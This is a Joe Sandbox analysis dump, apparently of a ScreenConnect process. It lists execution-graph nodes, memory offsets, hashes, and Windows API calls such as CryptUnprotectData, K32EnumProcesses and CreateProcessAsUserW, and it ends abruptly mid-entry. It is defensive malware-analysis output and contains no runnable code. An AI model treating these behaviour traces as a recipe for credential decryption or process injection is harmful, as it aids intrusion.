                                                                  • Opcode ID: 6d47f1ceb9434885ddf1de8ae49b756029636773aaed521eb1d77f789e5366c0
                                                                  • Instruction ID: eae66cfa9e7743821327f6de2fdc001983337133111b241739f22252692f14ad
                                                                  • Opcode Fuzzy Hash: 6d47f1ceb9434885ddf1de8ae49b756029636773aaed521eb1d77f789e5366c0
                                                                  • Instruction Fuzzy Hash: 2DD05E30A0120EEFDB04DFB8EA0155DB7FAEB44205B1046E8D908E7340EE316F409B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.1514588749.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_4df0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7d812044e26e88004abad963a5e191060c1956fb42e9fd2884e1154200c609b5
                                                                  • Instruction ID: 42eb256a8b7fc0975607e698f107d3b91379f3b9a9fa0df0ac275433ac488c90
                                                                  • Opcode Fuzzy Hash: 7d812044e26e88004abad963a5e191060c1956fb42e9fd2884e1154200c609b5
                                                                  • Instruction Fuzzy Hash: 3FC080F7D55A506FE32105441C815D52730F97161838EC269CC4066403511F78175175

                                                                  Execution Graph

                                                                  Execution Coverage:11.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:7.7%
                                                                  Total number of Nodes:246
                                                                  Total number of Limit Nodes:20
                                                                  execution_graph 39900 58a6028 39902 58a605c 39900->39902 39903 58a604c 39900->39903 39901 58a6055 39908 58a6198 39902->39908 39915 58a61a8 39902->39915 39903->39901 39904 58a6198 4 API calls 39903->39904 39905 58a61a8 4 API calls 39903->39905 39904->39903 39905->39903 39909 58a61cd 39908->39909 39911 58a61dd 39908->39911 39910 58a61d6 39909->39910 39936 58a4fc0 39909->39936 39910->39903 39922 58a6318 39911->39922 39929 58a6328 39911->39929 39917 58a61cd 39915->39917 39919 58a61dd 39915->39919 39916 58a61d6 39916->39903 39917->39916 39918 58a4fc0 ProcessIdToSessionId 39917->39918 39918->39917 39920 58a6318 2 API calls 39919->39920 39921 58a6328 2 API calls 39919->39921 39920->39917 39921->39917 39926 58a6328 39922->39926 39923 58a6348 39923->39909 39924 58a64ba K32EnumProcesses 39925 58a64f2 39924->39925 39925->39909 39928 58a633f 39926->39928 39939 58a4fcc 39926->39939 39928->39923 39928->39924 39931 58a633f 39929->39931 39932 58a6352 39929->39932 39930 58a6348 39930->39909 39931->39930 39933 58a64ba K32EnumProcesses 39931->39933 39932->39931 39935 58a4fcc K32EnumProcesses 39932->39935 39934 58a64f2 39933->39934 39934->39909 39935->39932 39937 58a6560 ProcessIdToSessionId 39936->39937 39938 58a65d3 39937->39938 39938->39909 39940 58a6468 K32EnumProcesses 39939->39940 39942 58a64f2 39940->39942 39942->39926 39943 3db1678 39944 3db16ba 39943->39944 39945 3db16c0 CryptProtectData 39943->39945 39944->39945 39946 3db1703 39945->39946 39947 3db5fe8 39948 3db600c 39947->39948 39950 3db601c 39947->39950 39949 3db6015 39948->39949 39951 3db6218 3 API calls 39948->39951 39952 3db6208 3 API calls 39948->39952 39955 3db6218 39950->39955 39961 3db6208 39950->39961 39951->39948 39952->39948 39956 3db624b 39955->39956 39958 3db623b 39955->39958 39967 14ef938 39956->39967 39957 3db6244 39957->39948 39958->39957 39960 14ef938 3 API calls 39958->39960 39960->39958 39962 3db624b 39961->39962 39964 3db623b 39961->39964 39965 14ef938 3 API calls 39962->39965 39963 3db6244 39963->39948 39964->39963 39966 14ef938 3 API calls 39964->39966 39965->39964 39966->39964 39968 14ef96b 39967->39968 39970 14ef95b 39967->39970 39968->39970 39973 14ef938 3 API calls 39968->39973 39979 3db4978 39968->39979 39986 3db4968 39968->39986 39993 14efac0 39968->39993 40001 14ea4b0 39968->40001 40006 14ea4a0 39968->40006 39969 14ef964 39969->39958 39970->39969 39977 3db4978 3 API calls 39970->39977 39978 3db4968 3 API calls 39970->39978 39973->39970 39977->39970 39978->39970 39981 3db49ac 39979->39981 39982 3db499c 39979->39982 39980 3db49a5 39980->39970 39985 14ef938 3 API calls 39981->39985 39982->39980 39984 3db6400 3 API calls 39982->39984 40011 3db63b0 39982->40011 39984->39980 39985->39982 39987 3db49ac 39986->39987 39988 3db499c 39986->39988 39990 14ef938 3 API calls 39987->39990 39989 3db49a5 39988->39989 39991 3db63b0 3 API calls 39988->39991 39992 3db6400 3 API calls 39988->39992 39989->39970 39990->39988 39991->39989 39992->39989 39994 14efae3 39993->39994 39995 14efaf3 39993->39995 39996 14efaec 39994->39996 40016 3db0007 39994->40016 40021 3db0040 39994->40021 39995->39994 39999 14ef938 3 API calls 39995->39999 40000 14efac0 3 API calls 39995->40000 39996->39970 39999->39994 40000->39994 40002 14ea4e1 40001->40002 40003 14ea4d5 40001->40003 40002->40003 40004 3db4978 3 API calls 40002->40004 40005 3db4968 3 API calls 40002->40005 40003->39970 40004->40003 40005->40003 40007 14ea4b0 40006->40007 40008 14ea4d5 40007->40008 40009 3db4978 3 API calls 40007->40009 40010 3db4968 3 API calls 40007->40010 40008->39970 40009->40008 40010->40008 40012 3db63e1 40011->40012 40014 3db6410 3 API calls 40012->40014 40015 3db6400 3 API calls 40012->40015 40013 3db63f6 40013->39980 40014->40013 40015->40013 40017 3db001f 40016->40017 40019 3db0500 3 API calls 40017->40019 40026 3db04f7 40017->40026 40018 3db00c4 40018->39996 40019->40018 40022 3db005d 40021->40022 40024 3db0500 3 API calls 40022->40024 40025 3db04f7 3 API calls 40022->40025 40023 3db00c4 40023->39996 40024->40023 40025->40023 40027 3db04ff 40026->40027 40028 3db04d0 40026->40028 40029 3db0520 40027->40029 40030 52c13e0 3 API calls 40027->40030 40031 52c13f0 3 API calls 40027->40031 40029->40018 40030->40029 40031->40029 40032 52c1e18 40033 52c1e6c ConnectNamedPipe 40032->40033 40034 52c1ea8 40033->40034 40035 52c5b68 40036 52c5baa 40035->40036 40037 52c5bb0 WaitNamedPipeW 40035->40037 40036->40037 40038 52c5be4 40037->40038 40043 52c28d8 40044 52c28ea 40043->40044 40045 52c292e 40044->40045 40047 52c2cd0 40044->40047 40049 52c2cd5 40047->40049 40048 52c31c0 40049->40048 40052 14e747f 40049->40052 40056 14e7490 40049->40056 40053 14e7490 40052->40053 40054 14e74d5 40053->40054 40055 14ef938 3 API calls 40053->40055 40054->40049 40055->40054 40057 14e74ba 40056->40057 40058 14e74d5 40057->40058 40059 14ef938 3 API calls 40057->40059 40058->40049 40059->40058 39842 52c103a 39844 52c0be0 39842->39844 39843 52c110a 39843->39843 39844->39843 39847 3db6410 39844->39847 39851 3db6400 39844->39851 39848 3db6439 39847->39848 39859 3db646f 39848->39859 39852 3db640a 39851->39852 39853 3db63af 39851->39853 39858 3db646f 3 API calls 39852->39858 39856 3db6410 3 API calls 39853->39856 39857 3db6400 3 API calls 39853->39857 39854 3db63f6 39854->39844 39855 3db6453 39855->39844 39856->39854 39857->39854 39858->39855 39860 3db64ad 39859->39860 39863 3db0500 39860->39863 39862 3db6453 39862->39844 39864 3db0520 39863->39864 39867 52c13e0 39863->39867 39871 52c13f0 39863->39871 39864->39862 39868 52c1402 39867->39868 39869 52c1425 39868->39869 39875 52c1431 39868->39875 39869->39864 39872 52c1402 39871->39872 39873 52c1425 39872->39873 39874 52c1431 3 API calls 39872->39874 39873->39864 39874->39873 39876 52c1458 39875->39876 39880 52c164f 39876->39880 39888 52c1660 39876->39888 39877 52c1498 39877->39869 39881 52c1687 39880->39881 39882 52c1772 CreateNamedPipeW 39881->39882 39883 52c1708 39881->39883 39887 52c1839 39882->39887 39896 52c02ac 39883->39896 39887->39877 39889 52c1687 39888->39889 39890 52c1772 CreateNamedPipeW 39889->39890 39891 52c1708 39889->39891 39895 52c1839 39890->39895 39892 52c02ac CreateNamedPipeW 39891->39892 39894 52c1768 39892->39894 39894->39877 39895->39877 39897 52c1788 CreateNamedPipeW 39896->39897 39899 52c1768 39897->39899 39899->39877 39813 52c59a0 39814 52c59be 39813->39814 39816 52c59d7 39814->39816 39819 52c5af0 39814->39819 39817 52c5af0 CreateFileA 39817->39816 39820 52c5b0d 39819->39820 39825 58a3461 39820->39825 39829 58a3420 39820->39829 39834 58a3488 39820->39834 39821 52c5a00 39821->39817 39826 58a3488 39825->39826 39838 58a25b4 39826->39838 39830 58a3430 39829->39830 39831 58a343a 39830->39831 39832 58a25b4 CreateFileA 39830->39832 39831->39821 39833 58a34c0 39832->39833 39833->39821 39835 58a349b 39834->39835 39836 58a25b4 CreateFileA 39835->39836 39837 58a34c0 39836->39837 39837->39821 39840 58a34d8 CreateFileA 39838->39840 39841 58a360d 39840->39841 40039 52c0560 40040 52c05b3 CreateProcessAsUserW 40039->40040 40042 52c0644 40040->40042 40060 14e0e30 40061 14e0e41 40060->40061 40065 14e0e84 40061->40065 40070 14e0eb7 40061->40070 40062 14e0e7a 40066 14e0e86 40065->40066 40076 14e36a0 40066->40076 40083 14e36b0 40066->40083 40067 14e133b 40067->40062 40071 14e0e86 40070->40071 40071->40070 40072 14e0ed6 40071->40072 40074 14e36a0 4 API calls 40071->40074 40075 14e36b0 4 API calls 40071->40075 40073 14e133b 40073->40062 40074->40073 40075->40073 40077 14e3629 40076->40077 40077->40076 40090 14e4c61 40077->40090 40078 14e36cc 40079 14e3764 40078->40079 40095 14ee588 40078->40095 40079->40067 40080 14e3739 40080->40067 40084 14e36c6 40083->40084 40089 14e4c61 RtlGetVersion 40084->40089 40085 14e36cc 40086 14e3764 40085->40086 40088 14ee588 3 API calls 40085->40088 40086->40067 40087 14e3739 40087->40067 40088->40087 40089->40085 40091 14e4c90 40090->40091 40092 14e4d30 RtlGetVersion 40091->40092 40094 14e4cc6 40091->40094 40093 14e4dda 40092->40093 40093->40078 40094->40078 40096 14ee58d 40095->40096 40097 14ee63e 40096->40097 40100 14eeaa8 40096->40100 40104 14eeab8 40096->40104 40097->40080 40101 14eeab8 40100->40101 40102 14eeb16 40101->40102 40108 14eeb60 40101->40108 40102->40097 40106 14eeade 40104->40106 40105 14eeb16 40105->40097 40106->40105 40107 14eeb60 3 API calls 40106->40107 40107->40105 40109 14eeb9e 40108->40109 40112 14ef790 40109->40112 40113 14eedc7 40112->40113 40114 14ef7b4 40112->40114 40114->40113 40115 14ef938 3 API calls 40114->40115 40115->40113

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 174 52c1660-52c16e6 183 52c16e8-52c16ea 174->183 184 52c16f1-52c16fd 174->184 183->184 186 52c16ff-52c1706 184->186 187 52c1708-52c170a 184->187 186->187 188 52c170c-52c1713 186->188 189 52c1718-52c1740 187->189 190 52c1715 188->190 191 52c1772-52c17ca 188->191 194 52c1749 189->194 195 52c1742-52c1747 189->195 190->189 196 52c17cc-52c17cf 191->196 197 52c17d2-52c1837 CreateNamedPipeW 191->197 198 52c174e-52c1763 call 52c02ac 194->198 195->198 196->197 202 52c1839-52c183f 197->202 203 52c1840-52c1861 197->203 201 52c1768-52c176f 198->201 202->203
                                                                  APIs
                                                                  • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 052C1824
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2489174969-0
                                                                  • Opcode ID: 83242855feec2779bb750a9596b4daa934fa645907b12d72664ffcc6bd6dfaa5
                                                                  • Instruction ID: 1cefe773bf95e698b960ae03dc7f38c231e76d355f8f1c6ccaf0d84321e87de9
                                                                  • Opcode Fuzzy Hash: 83242855feec2779bb750a9596b4daa934fa645907b12d72664ffcc6bd6dfaa5
                                                                  • Instruction Fuzzy Hash: 9961D270A003099FDB15DFA9C844BAEBFF6BF88310F14C06EE509AB292D7759915CB50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 250 14e4c61-14e4cb3 255 14e4cb5-14e4cc4 call 14e4838 250->255 256 14e4d02-14e4d08 250->256 259 14e4d09-14e4dd8 RtlGetVersion 255->259 260 14e4cc6-14e4ccb 255->260 266 14e4dda-14e4de0 259->266 267 14e4de1-14e4e24 259->267 273 14e4cce call 14e52e8 260->273 274 14e4cce call 14e52f8 260->274 261 14e4cd4 261->256 266->267 271 14e4e2b-14e4e32 267->271 272 14e4e26 267->272 272->271 273->261 274->261
                                                                  APIs
                                                                  • RtlGetVersion.NTDLL(0000009C), ref: 014E4DBE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2731028269.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_14e0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: 35833a93297f043acd8e34770f36f851e7010daf00fb806a608c44096cd39a84
                                                                  • Instruction ID: 82fa1b23a227964b0c8c7b5e00a8c01c22b4962e8aeadd76a9228b8e96eeec94
                                                                  • Opcode Fuzzy Hash: 35833a93297f043acd8e34770f36f851e7010daf00fb806a608c44096cd39a84
                                                                  • Instruction Fuzzy Hash: BE41AF70A003199FEB209B69DC18B9EBBF5FB45310F1481EAD548E7380DB755A45CF92

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 287 52c0560-52c05b1 288 52c05bc-52c05c0 287->288 289 52c05b3-52c05b9 287->289 290 52c05c8-52c05dd 288->290 291 52c05c2-52c05c5 288->291 289->288 292 52c05df-52c05e8 290->292 293 52c05eb-52c0642 CreateProcessAsUserW 290->293 291->290 292->293 294 52c064b-52c0673 293->294 295 52c0644-52c064a 293->295 295->294
                                                                  APIs
                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 052C062F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessUser
                                                                  • String ID:
                                                                  • API String ID: 2217836671-0
                                                                  • Opcode ID: 0d85a926e6c4e9c4d7cbfe74240490f601ab24e3ab51cf59c79ae74ca4467e57
                                                                  • Instruction ID: 7372361d5851e09a271e0c087e7bd191c1d493f73fd7cac55de5291adf4f2f34
                                                                  • Opcode Fuzzy Hash: 0d85a926e6c4e9c4d7cbfe74240490f601ab24e3ab51cf59c79ae74ca4467e57
                                                                  • Instruction Fuzzy Hash: CA41127690030ADFCB10CFA9C884ADEBBF6FF88310F14852AE918A7250D775A955CF90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 329 58a008a-58a0095 330 58a0097-58a009b 329->330 331 58a0055-58a005b 329->331 332 58a0d48-58a0dc0 CryptUnprotectData 330->332 331->329 334 58a0dc9-58a0df1 332->334 335 58a0dc2-58a0dc8 332->335 335->334
                                                                  APIs
                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 058A0DAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataUnprotect
                                                                  • String ID:
                                                                  • API String ID: 834300711-0
                                                                  • Opcode ID: fc329d3320c1899c9827055b875ddb7c11cbc8a52d7b3219ea6418067000dd65
                                                                  • Instruction ID: 43981a9457e6ed981bcc50da8799ee54fbaff71a8a48f057f3343751767f01d9
                                                                  • Opcode Fuzzy Hash: fc329d3320c1899c9827055b875ddb7c11cbc8a52d7b3219ea6418067000dd65
                                                                  • Instruction Fuzzy Hash: 53213676804249DFDB10DF99C848BEEBFF4FF48310F148459E954A7250D339A955CBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 338 3db1671-3db16b8 340 3db16ba-3db16bd 338->340 341 3db16c0-3db1701 CryptProtectData 338->341 340->341 342 3db170a-3db1732 341->342 343 3db1703-3db1709 341->343 343->342
                                                                  APIs
                                                                  • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03DB16EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2753068462.0000000003DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_3db0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataProtect
                                                                  • String ID:
                                                                  • API String ID: 3091777813-0
                                                                  • Opcode ID: ca804f00294eccd2fe0813b1ee2e0516bfcd27980c19c9f983e00321a3068c9c
                                                                  • Instruction ID: b3a9847bc6d461e4a46d669e5eb1690e369b42fc3529d10aeb8b827e40d3e98d
                                                                  • Opcode Fuzzy Hash: ca804f00294eccd2fe0813b1ee2e0516bfcd27980c19c9f983e00321a3068c9c
                                                                  • Instruction Fuzzy Hash: 812132B680034ADFDB21DF9AC844ADEBBF5FB88310F148429E919A7200C739A555CFA1
                                                                  APIs
                                                                  • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03DB16EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2753068462.0000000003DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_3db0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataProtect
                                                                  • String ID:
                                                                  • API String ID: 3091777813-0
                                                                  • Opcode ID: f38ba5e7c50aff2571e89d61ff07119d84d14778985f21c6922cbeaed417fa1e
                                                                  • Instruction ID: 56dd3b3d7448efb75f3f251ed9c63c1cbd95aed49ee6515331336cd6ac2a7ef8
                                                                  • Opcode Fuzzy Hash: f38ba5e7c50aff2571e89d61ff07119d84d14778985f21c6922cbeaed417fa1e
                                                                  • Instruction Fuzzy Hash: 4F21F3B6C0034ADFCB10DF9AC844ADEBBF5FB88710F148429E919A7250C779A555CFA1
                                                                  APIs
                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 058A0DAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataUnprotect
                                                                  • String ID:
                                                                  • API String ID: 834300711-0
                                                                  • Opcode ID: 30c7e504f4372d169bc7a64e821d7cb0fb01b497a5eb55aef3ce8eb09b311f13
                                                                  • Instruction ID: 9d1bddde15bcb60b5cd321a245bbb7ae14e24fd5374603bdf8e7de8b3ee0a39c
                                                                  • Opcode Fuzzy Hash: 30c7e504f4372d169bc7a64e821d7cb0fb01b497a5eb55aef3ce8eb09b311f13
                                                                  • Instruction Fuzzy Hash: 0B21367680024DDFDB10DF99C844BEEBBF5EF48320F108419EA14A7250C379A955CFA1
                                                                  APIs
                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 058A0DAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataUnprotect
                                                                  • String ID:
                                                                  • API String ID: 834300711-0
                                                                  • Opcode ID: 77826a92b6459bf23a7bb125adabea1c945e11a395eb39c74abece9711429fea
                                                                  • Instruction ID: 501b5c7a6670d23c8302c05cf165ea73df55ea488d5fd1a9fba42248615c7186
                                                                  • Opcode Fuzzy Hash: 77826a92b6459bf23a7bb125adabea1c945e11a395eb39c74abece9711429fea
                                                                  • Instruction Fuzzy Hash: 9121337680024ADFDB10DF99C845BEEBBF5FF88320F148419EA54A7250C339A955CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 141 58a6328-58a633d 142 58a633f-58a6342 141->142 143 58a6352-58a6359 141->143 144 58a6348-58a6351 142->144 145 58a640c-58a6420 142->145 146 58a635e-58a63a2 call 58a4fcc 143->146 147 58a6422 145->147 148 58a63e6-58a63ef 145->148 165 58a63a7-58a63ac 146->165 152 58a642e-58a6437 147->152 150 58a644c-58a64ae 148->150 151 58a63f1-58a640b 148->151 156 58a64ba-58a64f0 K32EnumProcesses 150->156 157 58a64b0-58a64b8 150->157 159 58a64f9-58a6521 156->159 160 58a64f2-58a64f8 156->160 157->156 160->159 166 58a6438-58a6445 165->166 167 58a63b2-58a63b5 165->167 166->150 168 58a63b7-58a63e4 167->168 169 58a6424-58a6429 167->169 168->148 168->152 169->146
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 597468fa13fb48f91fb5709f05e047dfa51482782db5a01f222f7fb659cc0106
                                                                  • Instruction ID: 71438d2cdd49fe30e9ca6b2d5976b21d85a0ff8bc7b2907d4c84c61b4870927e
                                                                  • Opcode Fuzzy Hash: 597468fa13fb48f91fb5709f05e047dfa51482782db5a01f222f7fb659cc0106
                                                                  • Instruction Fuzzy Hash: 0D516172E007098FDB24DF6AD884AAEBBF5FF88310F14892DD45AD7640D734A945CBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 206 58a25b4-58a3534 208 58a3588-58a360b CreateFileA 206->208 209 58a3536-58a355b 206->209 216 58a360d-58a3613 208->216 217 58a3614-58a3652 208->217 209->208 212 58a355d-58a355f 209->212 214 58a3582-58a3585 212->214 215 58a3561-58a356b 212->215 214->208 218 58a356f-58a357e 215->218 219 58a356d 215->219 216->217 224 58a3662 217->224 225 58a3654-58a3658 217->225 218->218 220 58a3580 218->220 219->218 220->214 227 58a3663 224->227 225->224 226 58a365a 225->226 226->224 227->227
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 058A35F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: e681228142f94695439efd57482112e9d75c8dfdcc292573356e5dc6735562c7
                                                                  • Instruction ID: f47aaf5cc561a0dc625fbbc5152076d77aee2179e72556309979d37e5a8cc91a
                                                                  • Opcode Fuzzy Hash: e681228142f94695439efd57482112e9d75c8dfdcc292573356e5dc6735562c7
                                                                  • Instruction Fuzzy Hash: B8513571D003499FEB14CFA9C844B9EBBF2FB48704F248529E819EB351DBB59845CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 228 58a34cd-58a3534 230 58a3588-58a360b CreateFileA 228->230 231 58a3536-58a355b 228->231 238 58a360d-58a3613 230->238 239 58a3614-58a3652 230->239 231->230 234 58a355d-58a355f 231->234 236 58a3582-58a3585 234->236 237 58a3561-58a356b 234->237 236->230 240 58a356f-58a357e 237->240 241 58a356d 237->241 238->239 246 58a3662 239->246 247 58a3654-58a3658 239->247 240->240 242 58a3580 240->242 241->240 242->236 249 58a3663 246->249 247->246 248 58a365a 247->248 248->246 249->249
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 058A35F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: f8d19f9c9bcd7c0cd9c7dc6ea9c1a3dd9417dc8010d0e45f8cebbb96cb61195c
                                                                  • Instruction ID: c1fe7dbd1c17be6fe66a7ca5d8e74ba4129e855799d0e256384f55e7060062ab
                                                                  • Opcode Fuzzy Hash: f8d19f9c9bcd7c0cd9c7dc6ea9c1a3dd9417dc8010d0e45f8cebbb96cb61195c
                                                                  • Instruction Fuzzy Hash: 30513471D003499FEB14CFA9C884B9EBBF2BB48704F248529E818EB351DBB59845CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 275 52c0559-52c05b1 277 52c05bc-52c05c0 275->277 278 52c05b3-52c05b9 275->278 279 52c05c8-52c05dd 277->279 280 52c05c2-52c05c5 277->280 278->277 281 52c05df-52c05e8 279->281 282 52c05eb-52c0642 CreateProcessAsUserW 279->282 280->279 281->282 283 52c064b-52c0673 282->283 284 52c0644-52c064a 282->284 284->283
                                                                  APIs
                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 052C062F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessUser
                                                                  • String ID:
                                                                  • API String ID: 2217836671-0
                                                                  • Opcode ID: edf1dcc63a919215145354e0d670982f4f902ed87565cfced27fecaa60aaaac4
                                                                  • Instruction ID: 623a3eadf1f0193e76f782c38de0e34fc117ea58e988e2bda1326c3a94ad2cbd
                                                                  • Opcode Fuzzy Hash: edf1dcc63a919215145354e0d670982f4f902ed87565cfced27fecaa60aaaac4
                                                                  • Instruction Fuzzy Hash: F041227690020ADFCF10CFA9C884ADEBBF1FF88310F14856AE918A7251D774A955CF90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 298 52c0290-52c17ca 302 52c17cc-52c17cf 298->302 303 52c17d2-52c1837 CreateNamedPipeW 298->303 302->303 305 52c1839-52c183f 303->305 306 52c1840-52c1861 303->306 305->306
                                                                  APIs
                                                                  • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 052C1824
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2489174969-0
                                                                  • Opcode ID: ef7ac587ef85263863010ba25664259778cbdf1a3f50c82a16cd14d6c9054a57
                                                                  • Instruction ID: 99c7ad24ec5809cdf178422056053793e1677b5b23fba3419d328a14410310ce
                                                                  • Opcode Fuzzy Hash: ef7ac587ef85263863010ba25664259778cbdf1a3f50c82a16cd14d6c9054a57
                                                                  • Instruction Fuzzy Hash: 06317A718043489FDB11DFA9D484BCEBFF1BF49310F14809AE858AB262D3759859CB51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 309 52c02ac-52c17ca 311 52c17cc-52c17cf 309->311 312 52c17d2-52c1837 CreateNamedPipeW 309->312 311->312 314 52c1839-52c183f 312->314 315 52c1840-52c1861 312->315 314->315
                                                                  APIs
                                                                  • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 052C1824
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2489174969-0
                                                                  • Opcode ID: bcfe9ae3a7a5460e4b2eace1b78b699c1e5aeb8015144beff6f01f5a3b408b0a
                                                                  • Instruction ID: c431da59a28c58ee7606c9f1b2452d7bec7f5d66f0c185048d75fa54334f1078
